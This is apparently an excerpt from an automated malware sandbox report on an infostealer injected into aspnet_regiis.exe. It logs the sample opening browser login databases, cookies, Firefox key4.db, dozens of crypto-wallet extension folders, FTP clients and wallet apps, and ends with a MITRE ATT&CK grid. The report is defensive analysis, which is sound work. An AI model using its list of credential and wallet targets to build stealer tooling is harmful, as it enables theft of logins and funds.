              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XQACHMZIHUJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2214373366.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 768, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 768, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              13
              Virtualization/Sandbox Evasion
              LSASS Memory151
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager13
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information
              LSA Secrets11
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Software Packing
              Cached Domain Credentials33
              System Information Discovery
